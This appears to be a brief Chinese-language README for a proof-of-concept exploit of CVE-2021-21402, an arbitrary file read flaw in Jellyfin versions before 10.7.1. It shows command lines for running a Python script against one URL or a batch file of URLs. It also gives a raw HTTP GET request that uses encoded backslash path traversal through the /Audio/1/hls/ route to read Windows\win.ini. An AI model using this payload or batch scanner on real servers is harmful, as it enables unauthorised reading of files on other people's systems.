POC 任意文件读取漏洞（CVE-2021-21402）

## 影响范围 

```http
Jellyfin < 10.7.1 
```

## POC

```bash
#单个url测试
python3 CVE-2021-21402.py -u http://127.0.0.1:1111

#批量检测
python3 CVE-2021-21402.py -f url.txt
```

## EXP

```
GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Host:xxx.xxx.xxx.xxx
Content-Type: application/octet-stream
```